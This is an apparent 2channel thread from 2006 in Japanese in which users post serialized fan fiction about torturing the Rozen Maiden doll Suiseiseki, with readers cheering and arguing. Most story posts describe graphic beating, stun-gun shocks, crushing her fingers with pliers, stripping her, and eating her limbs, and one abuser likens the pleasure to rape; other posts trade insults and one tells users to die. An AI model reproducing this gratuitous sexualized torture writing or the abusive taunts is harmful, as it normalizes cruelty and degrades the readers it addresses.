>>451 GJ!!

俺も同じくソフト系注文。  まぁハードなやつもおもしろいが。。

456 :名無しかわいいよ名無し:2006/02/26(日) 00:15:26 ID:zHMcZJir
>>416の続き、俺が引き継いだ

「もうやめてですぅ!」
隙を見て逃げようとする翠星石。だが長い髪を掴まれてしまう。
「痛い!痛いですぅ!はなしやがれですぅ!」
「今離してやるぜ!」
トニーはカマで掴んでいた翠星石の髪を断髪した。
「ふぎゃ!」
髪を切った勢いで顔面から床に倒れこむ翠星石。
すかさずトニーはスレッジで腹を叩き潰す。
「っぐえ!」
腹部に物凄い激痛が走る。
「うえ!っげほげほ・・・ううう・・・」
「ぐへへへへへ・・・この快感・・・たまらねえ!レイプより気持ちいいぜ!」
トニーが気味の悪い笑い声を上げる傍らで翠星石は悶え苦しみ、痛みなのか悲しみのせいか何かで泣いていた。
「お腹が・・・痛いですぅ・・・助けて・・・ジュン・・・」
「苦しいか?だが俺には気持ちよく感じるぜ!もっともっと痛めつけてやる!っほらほら!」
スレッジで腹、胸、を何度も叩きつける。
「もう・・・やめて!ジュンになんて会えなくていいです!ですからもう痛めつけないでですぅ!」
だがトニーの攻撃は止むことはない。
「ああ?ジュン?そんなやつに会わせるなんて言って憶えはねえ!もう止めろ?クズが偉そうに吠えるんじゃねえ!!!」
トニーは翠星石の口を無理矢理こじ開けた。
「これでも銜えてろ!」
そう言ってトニーは腐った子豚の生首を取り出した。
「きゃあああ!そんなもの食えねえです!やめて!やめて!ん・・・っぐ!」
ひどく痛めつけられたにも関わらず、暴れる翠星石。だが必死の抵抗など全くの無意味である。力でトニーに適うはずがない。
その小さな口一杯に押し込まれる生首。苦しさのあまりに涙が溢れる。
「これでしばらく大人しくしてろ!」
そしてトニーはスタンガンを取り出した。翠星石の目の前でスイッチを入れてみせる。スタンガンからはバチバチと電流の音が聞こえる。
そしてそれを翠星石の腹に押し付けた。
翠星石の体には激痛が走る。
「ん・・・んんんんん!!!・・・っぶほ!ぎいやああああ!!!」
あまりの痛さに生首を吐き出してしまった。
「うひゃひゃひゃひゃ!!!もう最高だぜ!その顔!その苦しみ方!お前は最高の人形だぜ!」
そう言ってトニーは翠星石の服を引き裂いて裸にした。
「きゃあ!今度はなにするつもりですか!この変態野郎!」
翠星石は顔を赤面しながら必死に文句を言う。
「まだ立場がわからねえのか?なら第2ステージに行く前におしおきだ!」
トニーはまたスレッジで翠星石の腹を叩き潰す。
「うげ!」
痛みで蹲る翠星石を掴んで天井に掛かっている鎖に翠星石の両手を縛る。
「もう・・・ッグス、嫌です・・・ジュン・・・」
「おいおい、ジュンには会えなくても良いんじゃなかったのか?嘘つくんじゃねえ!」
「きゃああああ!」
再びスタンガンを浴びる翠星石。
「ほらほら!もっともっといくぜえ!!!」
トニーはスタンガンの電流を何度を浴びせてやった。
「はあはあ・・・少し疲れたな。寝るとするか」
そう言ってトニーはその場に寝転がった。
「うう・・・チャンスです・・・スィドリーム・・・夢の扉を開くです!」
翠星石は夢の扉を開き、そこからnのフィールドを通してジュンの家に帰れるかもしれないと考えたのだ。
幸い、鎖はそれほどきつく縛られておらず、簡単に解けた。
「さあ行くですよ!」
翠星石はトニーの夢の世界に入った。

457 :名無しかわいいよ名無し:2006/02/26(日) 00:16:03 ID:zHMcZJir
そこは荒廃した町並、どす黒い川、だが空だけは晴れているという世界だった。
「思ったとおり気味の悪い世界ですぅ」
川に沿って歩いていくと、トニーらしき人物がいた。
姿は見えないが誰かと会話しているようだ。
『おうデュード、ブツの用意だけはしっかりできてるな』
これは今日の会話である。
「見つからないように進むです」
さらに川を下ると、いくつもの過去の彼と思われる人物が動いていた。
どうやら川に沿って今日の彼の行動がわかるらしい。
しばらく下っていくとジュンらしき姿が見えた。
「あれは・・・ジュン!」
ようやくジュンを見つけた翠星石。喜びのあまり走り出すが
「え?」
そこにはトニーも一緒だった。やがて会話が聞こえてきた。
『トニー、あいつをこれで殺してやってくれ。もう僕の前に二度と現れないように』
『わかってるぜ。デュードさんよ』
『あいつがいない所でその呼び方はやめてくれ』
『いや、闇に潜むあんた、それはまさしくデュードだ。あいつは死んだが魂はあんたの中にある』
『とにかく翠星石を殺してくれ。もう見たくもない』
『まかせとけ。木っ端微塵にしてやるよ』
会話が終わるとジュンは消え、トニーも消えた。
翠星石は涙していた。
「そんな・・・デュードがジュンで、しかも私を殺すように仕向けたなんて!そんなの絶対嘘です!」
そのまま泣き崩れてしまった。
「うう・・・ジュンの馬鹿!そんなに私のことが嫌いですか!っぐす・・・」
「いや、あいつはてめえのことを嫌ってたわけじゃねえぜ」
そこにトニーが現れた。
「トニー!う、どうやら本物のようです!」
先ほどまで見てきたトニーは夢の中の虚像である。今目の前に存在するのが夢の主、トニーだ。
「ジュンが私を嫌いじゃないとはどういうことですか!」
「自業自得ってやつだ。お前が自分をかわいがってほしいがためにあいつにした仕打ち。その時に生まれる憎しみ。その憎悪が増幅したから人の心にはデュードが宿る」
「意味がわからないです!説明しろです!」
「あいつはデュードに取り付かれて本望のまま動いてる。今あいつのところに行けば殺されるぜ!」
「だから俺はおまえを殺すんだよ!覚悟しろ!ぶち殺して中身もぶちまけてやるぜい!ぐひゃひゃひゃ!!!」

458 :名無しかわいいよ名無し:2006/02/26(日) 00:27:08 ID:EApKvgSX
あああああああ!!!!!
ついに来たかトニー
>>457人形に中身はないと思う。まあ軽く流しちゃて。
他のドールはジュンの家ではどうなっちゃてるの?
皆虐待食らってるのかな・・・・

459 :名無しかわいいよ名無し:2006/02/26(日) 05:01:27 ID:KRm99Xif
原作でのジュンの中では
真紅>>こえられない壁>雛>蒼=銀(nのフィールドで意識共有)>>絶対障壁>>翠

くらいの意識の差があるように見える(金は背景キャラ)
デフォルトですでにジュンにスルーされてる、
それが翠クオリティw

460 :名無しかわいいよ名無し:2006/02/26(日) 08:59:02 ID:cd3jq9AE
ここはアンチスレじゃないんだが。

461 :名無しかわいいよ名無し:2006/02/26(日) 10:44:06 ID:WuLXtDjp
>>460
459が言ってるのは>>458の>他のドールはジュンの家ではどうなっちゃてるの?
への返答じゃないの?


462 :名無しかわいいよ名無し:2006/02/26(日) 14:24:04 ID:VLlcgLHZ
「な、何をするですか!?こんな事やめるです!」
普段から気に障る事ばかり俺に言ってくる翠星石。
毎日の暴言に俺の堪忍袋も切れてしまった。
俺はロープを持ち出し、翠星石が寝ている間に動けなくなるなるように縛ろうとした。
だが途中で目を覚ました彼女は当たり前だが激しく抵抗する。
「何でこんな事するですか!チビ人間のくせにこんな事…」
ドゴッドゴッ ゴスゴス バキッ
その"チビ"の一言が俺を刺激し、何度か顔面を殴りつけた。
「……うっ…ぐすっ…やめて…やめてですぅ……」
何度か殴っただけで泣き出す彼女。
今から俺がしようとしている事を実行したら気でも狂ってしまうのではないか。
そう思うと思わず顔がにやけてしまう。

大人しくなった翠星石の手と足を縛り終えた俺は、
まずはとばかりに彼女の腹を殴りだす。
ドスドスドスドスドスドスドス
「うっ!げっ、げふっ…ゴホッゴホッ…う、うぐっ」
30発ほど連続で殴り続けると、彼女の口から胃液が吐き出された。
ビチャビチャッ ビチャッ
「うぐ……何で…何で翠星石のお腹を叩くですか…?どうして…?」
何故かって?それは面白いからさ
と翠星石に軽い口調で言ってあげると、
彼女の顔が恐怖から絶望の表情に変わるのが分かった。

463 :名無しかわいいよ名無し:2006/02/26(日) 15:36:02 ID:Y3w/5EEw
>>457
スタンガンGJw

464 :名無しかわいいよ名無し:2006/02/26(日) 16:24:59 ID:FWHCihvJ
>>432
お前に答えるつもりがないだけだろ

465 :名無しかわいいよ名無し:2006/02/26(日) 17:19:02 ID:+/wc6HoX
>>462
wktk

466 :名無しかわいいよ名無し:2006/02/26(日) 19:39:29 ID:VLlcgLHZ
>>462
「う…どうしてですか…?翠星石は何も悪い事してないですぅ…」
この糞人形は今まで俺に対してしてきた悪行の数々を忘れているのか?
反省の色も無く謝りもしない翠星石を見て、より一層腹ただしくなった。
俺はふと思い出したように工具箱を探し、中からペンチを取り出す。
「そ、それで何するです…?ひっ、嫌、です…いやぁ、いやいやいやいやああああぁぁぁ!!!」
ブチッ!ゴキッ!メキメキッ!
「ああああああああああぁぁぁぁぁぁぁぁ!!!!」
翠星石の人差し指がへしゃげた所で俺はいったん力を抜く。
悲鳴が途絶え、口をパクパクと魚のように動かし
息を吸い込もうとするその瞬間俺は 指先に力を込める。

メキッゴキッ!グチャッ!
一本一本丁寧に翠星石の指をペンチで潰していく。
右手の指は全て綺麗に潰し終わった。
続いて左手の指。
「ぎぃ………う……あ……痛い…です…もう……いやだぁ…」
苦痛と涙で顔をグシャグシャにしながら言葉にならないような声を出す。
ベキッボキッ!ゴキッ
ようやく両手の指を潰し終わった。
見るも無残な彼女の指はあちらこちらの方向へひん曲がっている。
これで如雨露はもう持てないね
そう耳元に囁くと、
「ひっく……ひっく……許さないです……絶対許さないですから………!」
何だ、まだ文句を言える元気が残っているのか。
指を全て潰されたのに懲りないやつだ。
だが彼女の苦痛の表情を見ると、これが精一杯の抵抗だというのがうかがえる。


467 :名無しかわいいよ名無し:2006/02/26(日) 21:41:52 ID:bj7BNvqc
うはw

468 :名無しかわいいよ名無し:2006/02/27(月) 00:44:30 ID:UbiC7uXV
7ドールの中で間違いなく精神的に幼くて分別に欠けると思う。
ネタじゃなくて、マジ。内面の脆さを強がりと悪態とツンデレで
発散することしかできない。こんなキャラに愛着感じてる奴らこそ異常。

誰か一人翠星石になってこんなことされても嬉しくないだろうし、だって?

その前に考えてみ?実際にこやつと一緒の日常をリアルに想像しただけで
ゾッとする。俺なら、現実に奴が存在したら間違いなく
人形虐待が動物のそれのように法で規制されない限り
このスレの創作文章を凌駕する残酷さでもって翠を精神的にネチネチと、
物理的にはより凄惨に虐めることを誓約できるであろうさ。


469 :名無しかわいいよ名無し:2006/02/27(月) 02:22:36 ID:1YVHGwaY
>>468
荒らしを相手にするなよ
それに、ここで虐待してる奴らもお前みたいに心から翠星石を憎んでる奴はいないんじゃないか・・・・。 
俺はお前がリアルに存在することにゾッとするよ。

470 :名無しかわいいよ名無し:2006/02/27(月) 03:13:17 ID:dbZtlCj2
俺は462と466を書いたんだけどこういう完全悪な鬼畜系は需要無いか?
確かにこれらの文章から愛なんてものは微塵も感じられないが
このスレを一通り見て、ぬるい虐待ばかりという意見が多数あったから書いてみたが…
ちなみに俺自身は翠星石はお気に入りキャラの一人で彼女に対し愛も持っている。

471 :名無しかわいいよ名無し:2006/02/27(月) 03:40:18 ID:AF1p8MmZ
翠星石を人混みの中で一人置いていって、怯える姿を遠くから見つめて見たい。

472 :名無しかわいいよ名無し:2006/02/27(月) 03:48:38 ID:4k1Dg58i
トニーレベルの虐待きぼん

473 :名無しかわいいよ名無し:2006/02/27(月) 03:52:08 ID:aeLUa3W9
>>412のつづき
翠星石は額に痛みを感じつつめざめた。
「どういうことですか・・・」
いままで着ていた服がない。しかし蟹の格好はしていて、フックで吊るされたままだ。
「くっ、どうしてはずれないですか! 痛いです!」
チャリン チャリン チャリン チャリン
鎖の音が倉庫の中に響く。蟹の格好をとろうともがいているが、接着剤で固定されているのかはずれない。もがけばもがくほどフックが額にくいこむ。
ツカ ツカ ツカ
足音がした。人間が来たのだ。
「やっぱりおいしそうだなぁ・・・」
ゴクリ
「翠星石の服とっといておいしそうなんて変態ですぅ! この変態デブ人間!」
パスッ
人間は翠星石の右足をつかんだ。
「やめるですぅ! 離すですぅ!」
チャリン! チャリン! チャリン!
翠星石は暴れ、足を折り曲げ手で抱えようとした。何をされるのかわからない恐怖と裸にされたことへの羞恥心もあってかなり必死だ。
「勘違いしてんじゃねぇよ!」
グイッ!
右足を勢いよく引っ張られ、激痛が走る。
「フグッ! 痛いですぅ。 何するですか、バカ人間!」
ぺチョ 
人間はそれにはこたえず手にしている右足に下を当てた。
「ヒッ、何するです! はやくその汚らわしいものをどけるです!」
ツゥーーーーーーー
足首からふくらはぎ、ふとももまで一気に舌でなぞる。
「く、くすぐったいですぅ」
「あぁ、やわらかくておいしそうだ!」
人間の目があやしい輝きをはなった。
                      つづく

474 :名無しかわいいよ名無し:2006/02/27(月) 04:07:57 ID:aeLUa3W9
>>439
プルは人間。翠星石は人形。この差はでかい
>>445
よくぞやってくれました!
>>451-453
いいねぇ。呪い人形か
>>456-457
いいですね。ジュンにも見放されるとはね
>>459
ここで充分にかまってあげよう。ただし、虐待だけどねw
>>460
そうだね、翠星石虐待&虐殺スレだよね
>>468
文章書いてみよう。漏れが見たい
>>470
そんなことないよ。どんどん鬼畜系を投下しちゃってください。見てて面白いから

>>473
変換ミスってるなぁ・・・まぁ見てて気づきますね。続きはまたそのうち。おやすみ

475 :名無しかわいいよ名無し:2006/02/27(月) 12:30:25 ID:omiq3pcF
愛をもっての虐待、もしくはソフトを書けるなら書いてください。コメディ虐待もいいかも。
判断はお任せします

476 :名無しかわいいよ名無し:2006/02/27(月) 19:56:38 ID:aeLUa3W9
愛をもたない虐待推奨

荒らしが増長するので、できるだけソフトやコメディ虐待は書かないほうがいいかも

判断はお任せします

477 :名無しかわいいよ名無し:2006/02/27(月) 20:20:50 ID:omiq3pcF
まあ、どっち書いても荒らされる可能性は大(このレスは戯言なので出来るだけスルーしてくれ)


478 :名無しかわいいよ名無し:2006/02/27(月) 20:20:51 ID:UbiC7uXV
>468 ゾッとするならするがいい。俺の翠への嫌悪はマジだ。
ただ現実とファンタジーの区別が出来ないような精神異常と一緒にされては困る。
それに俺は本来動物虐待は好かん。人形が生き物(live)ではないから
平気で虐待できて心も痛まないというわけだ。
ついでにこのスレでも、必ずしも翠への愛だの好意だの萌だのの裏返しで
虐待書いている連中ばかりでもあるまい。本気でこのキャラに嫌悪を感じて
ぶつける者もいるだろう。そういう意味で愛をもたない虐待には賛成だ。
愛を持っての虐待派が引いてしまうような凄みのあるやつを。
荒らしを引用したことはすまなかった。俺もそのうち何か投下しよう。

479 :名無しかわいいよ名無し:2006/02/27(月) 20:31:59 ID:4k1Dg58i
というかなんで急に荒らしが増えたんだ?
誰か晒したのか?

480 :名無しかわいいよ名無し:2006/02/27(月) 23:04:01 ID:ipHMqJsQ
晒されたのではない。
翠星石マニアがこのスレを見つけて集まってき始めているだけだと
思う。
おれも作品を作りたいのだがなにぶん文才がない・・・orz
鳴風みなもの虐待&虐殺スレが見つからない・・・・・

481 :名無しかわいいよ名無し:2006/02/27(月) 23:36:47 ID:omiq3pcF
>>478
言われた通りにゾッとしてみる。(がたがたがたがたぶるぶるぶるぶるぶる)

482 :名無しかわいいよ名無し:2006/02/28(火) 00:03:59 ID:uNJguRrp
「おーい、真紅!真紅どこいったー?」
ジュンは先ほどから姿の見当たらない真紅を探していた。
鞄の中を開けてもいない。どこへ行ったんだ?
と、そこへ翠星石がやってきた。
「なにしてるですか?」
「真紅を探してるんだ。お前見てないか?」
翠星石はリビングにいたので、一緒にいたかもしれないと思い尋ねてみた。
「真紅なんて見てないですよ。話相手が欲しいなら翠星石がなってやってもいいですよ」
「馬鹿言え、お前となんて話すことあるか。真紅の手掛かりが掴めないんじゃ用無しだ。戻っていいぞ」
その言葉にしょんぼりする翠星石。最初からジュンと一緒にいたいためにやってきたのだ。
それなのにジュンのこの態度。翠星石は逆上した。
「どうして真紅じゃなきゃダメですか!あんな子の代わりくらい翠星石にも勤まるです!」
「『あんな子』だと?お前ごときに何が分かるんだ!」
ジュンにとって真紅は真紅でしかない。その他の何物にも例えることは許されないのだ。
切れたジュンは翠星石を廊下に放り投げた。壁に思いっきりぶつけられる翠星石。
「痛々・・・なにしやがるですか!」
ドアを開けて体を半分出したところでジュンがドアを閉めた。
「っぐえ!」
体を半分挟まれてしまった。
「勝手に入るな!糞人形!」
「うう・・・痛いですぅ・・・」
「前々からお前はウザかったんだよ。勝手に契約させて勝手に住み着いてこの態度!ふざけるな!」
そう言って翠星石の顔をボコスカ蹴りまくるジュン。
「や、やめるですジュン!翠星石は・・・ジュンのことを思って・・・」
「糞人形に気遣って貰うほど愚かじゃないんだよ!」
ジュンはドアを開け、挟まっていた翠星石を掴み、窓に思いっきり投げつけた。
「きゃあ!」
さらに押入れから出してきた釘バットで翠星石を殴打する。
「この!なにが!翠星石だ!ふざけた名前しやがって!そんなクズが真紅のことを『あんな子』呼ばわりするな!」
「痛い痛い!もうやめてですぅ!お願いですぅ!」
「はあはあ・・・」
息を荒くしたジュンは翠星石の胸座を掴んで自分の顔の前にまで持ってきた。
「お前みたいなやつ捨ててやる!」
ジュンは窓を開けるとあらん限りの力を振り絞って投げ捨てた。
家の前の道路へ一直線に叩きつけられる翠星石。そこへたまたま通りかかった車がそれを踏み潰していった。
それを憤慨した表情で見つめるジュン。やがて翠星石が動かなくなったことを確認すると窓を閉めて、ベットに座り込んだ。
と、ドア越しに声が聞こえてきた。
「ジュン、紅茶を入れて頂戴」
「・・・今すぐ入れるよ」
ジュンは薄く微笑みながらドアを開けた。
それから夜になった。
目が覚めた翠星石は瀕死の状態で必死にリビングの明かりが見える庭まで這いずってきた。
優しい家庭の明かりだ。声が聞こえる。
『あれ?翠星石がいないのー』
『翠星石?誰かしら?』
『さあ?誰のことだ?変なこと言うなよ雛苺』
『うゆ?よく考えたら雛苺も知らないのー』
その中に翠星石のいる場所はなかった。
彼女はそこに蹲り、泣いた。

483 :名無しかわいいよ名無し:2006/02/28(火) 00:52:21 ID:iNRyzyKs
ボロボロのドレスの裾を引きずりながら、それでも翠星石は
まだ自分を受け入れてくれる一抹の希望を求めて玄関に向かう。
車に轢かれたときに左脚をほぼ完全にタイヤで踏み砕かれ、左の足首は
千切れかかってぶらぶらしている。立ち上がることすらままならない。
スカートをめくり、脚の惨状を目の当たりにした翠星石はオッドアイを
泪で一杯に満たす。「うぅ、蒼星石..助けてほしいですよ..このままでは
翠はジャンクになってしまうですよ..ううぅ」
泣きながら、玄関に這いずって来た翠星石は、ドアノブに手をかけようと
必死の抵抗を試みるが、片足だけでは立つことも出来ず、呼び鈴すら手に届かない。
這い蹲りながら両手をバタつかせてドアを叩く翠星石。
『なんかお外で音がするのー』雛が玄関の異変に気付くが、ジュンは
「今日は風が強いからな。玄関も立て付けが悪くなったんだな」
と知らぬそぶりだ。(あの性悪悪魔人形め、轢かれてもしぶとく生きてやがる)
「しょうがないな、ちょっと玄関直してくる」そう云いつつジュンは一旦2回へ上がる。
工具を取ってくるフリをして、2階の窓から翠星石の鞄を投げ捨てた。
何食わぬカオで玄関へ向かう。扉を開くと、案の定、泣きじゃくりボロボロ、
満身創痍の翠星石。
「ち、ちび人間..よくもこんな仕打ちしやがったですぅ..
お前なんかもうマスターでもミーディアムでもなんでもないですぅ!
お前こそ悪魔ですぅ!翠星石を、翠星石を、よくもこんな目に..えぐっ えぐっ」
ジュンはそ知らぬ顔で、サンダルを履いた足で、襤褸切れと化した
ヘッドドレスを被った翠星石の頭を強く踏みつけた。
「強がってんじゃねーよ!え?ウチに入れて貰いたいくせにさ!
何度も玄関叩きやがって。そんな減らず口を叩いているうちは
絶対入れてやるもんかよ!」グリグリとサンダルで翠星石の顔面を玄関の
踏み石に摺りつける。翠星石は言いようのない悲しさで胸が一杯になった。
真紅が信頼するマスター。頼りないけど、結構イイ奴だと思っていたのに。
どうして、どうして..


484 :名無しかわいいよ名無し:2006/02/28(火) 01:14:00 ID:iNRyzyKs
「そうだ。お前なんかこうしてやるさ!」そう云うとジュンは先ほど庭に落とした
翠星石の鞄を持ってくると、鞄を力一杯、翠星石の両足に叩き付けた。
『あぐぅっつ!あぐううっつ!い、いいたいですぅ!何するですぅ!
ローゼンメイデンにとって命よりも大切な鞄を..よりにもよって
鞄で叩くなんて非道いですぅ!痛いですよぉ!』
轢かれた左脚は完全に粉々になり、残る右足も膝関節から下がほぼ壊滅した。
文字通り、両足を失った翠星石は愕然とする。
『ううぅぅ!す、す、翠星石はジャンクになってしまったでsぅ』
「ハァ?寝言云ってんじゃねーよ!お前なんてもともと、真紅や水銀燈に比べりゃ
当の昔からジャンクみたいなもんじゃねーかよ!この性悪毒舌人形!
今までお前に散々虐められた雛苺だって、お前のことをどれだけ嫌っていたか、
わからないだろう!水銀燈に襲われたとき、僕がどんな気持ちで契約してやったと思ってるんだよ!
思い上がるな!このローゼンメイデンワースト1の駄作ゴミ人形!」
凄まじい形相で怒るジュンは、ボロボロの翠星石のスカートを引きずって
路地から車道の真ん中にやってきた。中央のマンホールの蓋をこじ開けると、
その穴の中に翠星石のかつてはチャームポイントであった、今では
毛羽立ってボロボロの二股お下げ髪を投げ入れる。そして、髪だけを放り込んだ
マンホールに蓋をする。重い蓋によってお下げ髪を固定された翠星石は
じたばたもがいても逃れようがなかった。
「どうだ、さっきは運良く助かったみたいだが今度は逃げられないさ。
何度も車につぶされればいい。ここは大型トラックもバンバンくるからな。
さあ何日五体満足でいられるかな。おっと、もう脚が潰れたから五体満足じゃないんだったよなぁ!」

485 :名無しかわいいよ名無し:2006/02/28(火) 13:57:49 ID:IP1mYZfm
さっさとシネヨテメーラ

社会のくずで、

犯罪予備軍で

頭悪くて
おまけに孤立共ときたか
生きてる価値ないねWWWWWWWWWWWWWWWWWWW

あちこちで叩かれまくってるよWWW自分の立場を理解しましょうね幼児

486 :名無しかわいいよ名無し:2006/02/28(火) 14:46:57 ID:DGOAtMjr
どなたかマスターに従順な蒼星石を虐待したいやつはおらんのか?

487 :名無しかわいいよ名無し:2006/02/28(火) 15:57:52 ID:5FghvC7/
>>486
 保管庫に行けば良いんじゃないか?

488 :名無しかわいいよ名無し:2006/02/28(火) 16:01:31 ID:V6PnA1tR

              ___
             く/',二二ヽ>
             |l |ノノイハ))
              |l |リ゚ ヮ゚ノl >>485死にやがれですぅ
    キコキコキコ    ノl_|O┬O
         ≡ ◎-ヽJ┴◎




489 :名無しかわいいよ名無し:2006/02/28(火) 16:02:13 ID:V6PnA1tR

 いな     ___      性
 いん   く/',二二ヽ>    悪
 言と    .|l |ノノイハ))
 葉聞    |l |゚ ∀゚ノl|
 かこ   ノl_|(l_介」).|
 |え   ≦ノ`ヽノヘ≧
 |の   ミく二二二〉ミ
  !!




490 :名無しかわいいよ名無し:2006/02/28(火) 16:13:30 ID:ZrHTP/4w
身体より精神を壊すタイプの話が好みなのだわ

491 :名無しかわいいよ名無し:2006/02/28(火) 18:09:28 ID:yMWs/5KP
>>408-409 >>411-412 >>473のつづき
ペチャ ペチャ ペチャチャ
人間は無表情に一心不乱になめつづけている。
「キャッ、もうくすぐったいですぅ。やめてですぅ」
「そうか、じゃそろそろ・・・」
そういうと人間は口を翠星石の右足首、アキレス腱の辺りに持って行き、大きく口を開けた。
バキッ
「ヒギャァァァァァァァァァァァァッ!」
人間は翠星石の右足首を噛み千切った。
ボリ ボリ ボリ ボリ ボリ ボリ ボリ
あたりにはゆっくりと人間が翠星石の一部を噛み砕く音が響き渡る。
ゴクン
「プハァ、やっぱりおいしいな!」
「なんてことするです! こんなのおかしいです!」
翠星石は顔を真っ赤にして抗議している。
「え? だってもうなめられるのが嫌だったんでしょ。感謝してほしいなぁ、食してやってるんだから」
しれっとした態度で人間はこたえる。
「そういうことじゃねぇですぅ! 翠星石がいいたいことは、あぁ・・・」
サッ ボキリ!
「クキャァァァァァァァァァァァァァ! 痛いです! 痛いですぅ!」
翠星石の言葉の途中で、人間は手で翠星石の右膝より下をもぎとった。
「ここもおいしそうだなぁ」
「もうやめてです! デブ人間なんていったことは謝るです! だから・・・」
人間は手にした食材を手でもてあそびながら、興味深げにあわてふためく翠星石を見て口を開いた。
「本当にそれだけかよ。もっといろいろしてきたんだろう?」
「・・・」
ボキリ クチャクチャクチャクチャ  ペッ!
返答しない翠星石を尻目に人間は翠星石の一部だったものを口に含み吐き出した。
「ここは大してうまくねぇな」
                          つづく

492 :名無しかわいいよ名無し:2006/02/28(火) 18:16:48 ID:yMWs/5KP
>>480
待ってるよ。練習のつもりで書いてみては?
>>482-484
翠星石ならこうなって当然ですね。ジュンも変なのがいなくなってよかったでしょう
>>485
見たくないものは見なければいいだけ

493 :名無しかわいいよ名無し:2006/02/28(火) 23:19:16 ID:q8fP5PWK
俺の翠星石に
なぁーに虐待だのレイプだの
ひどい事してるんだおめーらはっ!

見なかったら済む。あぁ、物理的にはそうだが
精神的に"翠星石が虐待や暴行を受けている、そんな物語を作られている事実、"
それが許せないんだよ!オタンコナスッ!

494 :名無しかわいいよ名無し:2006/02/28(火) 23:33:22 ID:IP1mYZfm
同意
キモス。
うんこよりキモス。
世界のキモスレ住人トップ3に入る

495 :名無しかわいいよ名無し:2006/03/01(水) 00:06:02 ID:iNRyzyKs
ageるなクソバカタレ↑

496 :名無しかわいいよ名無し:2006/03/01(水) 00:12:27 ID:zpyV7z3E
ミドリは喪前のもんじゃないってw
あんなクソ性悪人形なんてミドリのドレスを被ったゴミ
虐めても虐めてもまだまだ虐め足りない。
今日も四肢を破壊された翠を想像してストレスハッサァーン
おまえはローゼンメイデンの面汚し ですぅを聞くたびにムカつくンだよ!

497 :名無しかわいいよ名無し:2006/03/01(水) 00:24:40 ID:wpbN9RAU
なんだとー、テメー
あれが翠星石の良さであり、翠星石の性格しかたのない事なのだ!
大体、翠星石が対象にしてるのは、あのヒッキーだろうが
それをお前らが仕返しのつもりでこう言う作品を描くのは
お門違いなんだよー、タコ!

ローゼンの面汚し?
この作品を虐待なんぞのジャンルに変えて描く
お前らこそが面汚しだ!この自己中野郎

498 :名無しかわいいよ名無し:2006/03/01(水) 00:30:14 ID:6frQiVGl
>>493
お前、思い通りにならないとすぐ泣き喚く幼児と
大して変わらんな。

499 :名無しかわいいよ名無し:2006/03/01(水) 00:30:18 ID:zpyV7z3E
ハァ?仕方の無い?ハゲワラス
それとな、仕返しじゃあねえんだよ、ウサ晴らしさ!
これからもあのクソミドリを精神的サンドバッグにしてやるぜ!

500 :名無しかわいいよ名無し:2006/03/01(水) 00:32:42 ID:Mvf1KRSm
>>499
がんばれ
応援してるぞ

501 :名無しかわいいよ名無し:2006/03/01(水) 00:32:47 ID:wpbN9RAU
>>498
俺が泣きじゃくる子供なら
お前らは気に入らない奴には暴力でしか返せない
いじめっ子だ

>>499
全面的にきにくわねぇ!

502 :名無しかわいいよ名無し:2006/03/01(水) 00:34:57 ID:zpyV7z3E
暴力だけじゃあないんだなー
精神的恥辱的にもお返しして差上げてますが、何か?

503 :名無しかわいいよ名無し:2006/03/01(水) 00:36:22 ID:tP4liPvl
ここは2chですよオマイラ。

504 :名無しかわいいよ名無し:2006/03/01(水) 00:37:41 ID:wpbN9RAU
>>502
・・・この知障、精神的障害者が
何かに暴行を与えないと禁断症状が出るんだろ・・・

作品の面汚しはやめろ


505 :名無しかわいいよ名無し:2006/03/01(水) 00:40:31 ID:Mvf1KRSm
俺は翠星石虐待派の一員だ。
これから虐待小説を書き始める予定だ。

506 :名無しかわいいよ名無し:2006/03/01(水) 02:32:42 ID:Mvf1KRSm
とは言ったものの、何を書いたらいいのかわからない

507 :名無しかわいいよ名無し:2006/03/01(水) 02:38:42 ID:p5YiR8S6
蟹、トニー、デュード、新規
どれでも自由なのをどうぞ

508 :名無しかわいいよ名無し:2006/03/01(水) 03:52:42 ID:/LBiN6+a
よしあえてこのスレでマスターとラブラブな翠ちゃんを書いてみよう。

「翠星石、いっしょに寝よ」
「薔薇乙女は鞄で眠らないとダメなんですぅ、だから独りで寝ろですよ」
「翠星...石...そんなに一緒に寝るのが...嫌...なのかorz」
「う...い、いいですよ、ま、まったくしゃーねぇな、いくつになってもガキですね
 この翠星石がいっしょに寝てやらないと怖くて寝られないのかですぅ」

「これでもうかれこれ一ヶ月めですぅ。薔薇乙女は鞄で寝ないと過去からの記憶を紡ぐことができず、
 いつか記憶もあいまいになって精神が崩壊したジャンクになってしまうのですが...あんな顔をされたら断れないですぅ」
マスターの寝顔を見ながらつぶやく翠星石、だがマスターの幸せそうな寝顔を見てると
やはり今夜も一緒に寝て良かったと思ってしまうのだ。

と、マスターが寝返りをうった。マスターの体で下敷き状態になってしまう翠星石。

「んっ、あうっお、重いですぅ〜ハァハァ...ふぅふぅ、い、息ができねぇですぅ〜」
なんとかマスターの体から出ようもがこうとするが
体をとおして聞こえてくるマスターの健やかな寝息を聞いていたら、もがくと起こしてしまいそうで、翠星石はできなかった。

マスターを起こさないように慎重に慎重に布団をでる翠星石
「ふぅ〜一息つけたです」
「翠星石...」
「お、起きたですか?」
振り向くとさっきまで健やかな寝顔だったマスターの顔が苦痛にゆがんでいるようにみえた。
「翠星石...どこ...独りに...しないで...」
どうやら悪い夢をみているようだ、悲痛な寝言をつぶやいている。
「大丈夫ですよ、翠星石はここにいるですよ」
翠星石枕元にすぐかけよってマスターの耳元にささやく。
「翠星石...そこにいたんだね...」
苦痛にゆがんでいたマスターの顔から憑き物が落ちたように穏やかになる。
そして眠ったまま翠星石の体を抱き寄せる。

 ミシ...ミシィ...ミシミシ...
「う...あ...う...痛っ...つ...つぶれちゃうです...
抱き癖のあるマスターは眠りながら翠星石の小さな体を抱きしめる
でも
「もうどこにも行かないで翠星石、ずっと...ずっといっしょだよ...」
という声を聞くと自分が妹を失ったときの痛みを知っているだけに逆らえなくなってしまう。
それにこの前ちょっと部屋を出たしきに自分がいなくなったと思い込んだマスターの
半狂乱になった姿を見てしまったから...

キリキリキリキリ...コキッ
「っ!いたっ...この音は肘かどこかの関節がズレた音ですね...」
翠星石はマスターの寝顔を見る。
もう絶対離したくないとでも言うような顔で必死に ぎゅっと大切な翠星石を抱きしめてるのだ。

「...もがいたら、髪がほつれちゃったですぅ...朝になったらまた髪をすいてもらうです...
 そして翠星石がお料理してあげるのです...ずっとずっといっしょなのです...だからそんな顔しないでほしいです...」

そうつぶやく翠星石だった。

end



......流れを読まず純愛物を書いたつもりだったんだが、どうしても虐待になってしまうorz




